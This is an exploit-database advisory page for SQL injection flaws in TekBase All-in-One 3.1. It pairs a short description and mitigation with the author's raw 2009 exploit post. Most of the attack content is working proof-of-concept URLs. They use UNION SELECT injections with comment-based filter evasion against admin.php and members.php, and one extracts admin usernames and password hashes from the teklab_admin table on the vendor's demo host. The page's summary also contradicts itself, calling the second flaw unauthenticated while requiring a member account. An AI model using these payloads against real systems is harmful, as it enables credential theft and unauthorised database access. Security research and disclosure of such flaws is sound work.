TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities

vendor:

TekBase All-in-One

by:

n3wb0ss

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: TekBase All-in-One

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: No

Related CWE: N/A

CPE: a:tekbase:tekbase_all-in-one

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities

TekBase All-in-One 3.1 is vulnerable to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The first vulnerability can be exploited by an authenticated attacker with admin access. The second vulnerability can be exploited by an unauthenticated attacker with a valid user account. Both vulnerabilities are caused by improper sanitization of user-supplied input in the 'op' and 'y' parameters of the 'admin.php' and 'members.php' scripts respectively.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

############################
# Author: n3wb0ss
# Date: 15/06/09
# Contact: n3wboss@Safe-mail.net
############################
# Software: TekBase All-in-One 3.1 
# Vendor: tekbase.de
# Example: http://demo.tekbase.de/
# Vendor contacted: No
# Risk: High
############################
# I found this website on a german board, looking for another script.
# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter...
# It's vuln I found a lot more, but I decided to release just two examples to the public.
# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login)
############################
# Here it is (adminaccess needed):
# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P
# Have fun!
# POC: 
http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/*

############################
# Second one( just be a member):
# POC:
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/*
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/*

############################
# As said before, just 2 of many vulns
# 
#
# H4ppy Gr33tinGs to the only On3
#
###########################

# milw0rm.com [2009-06-17]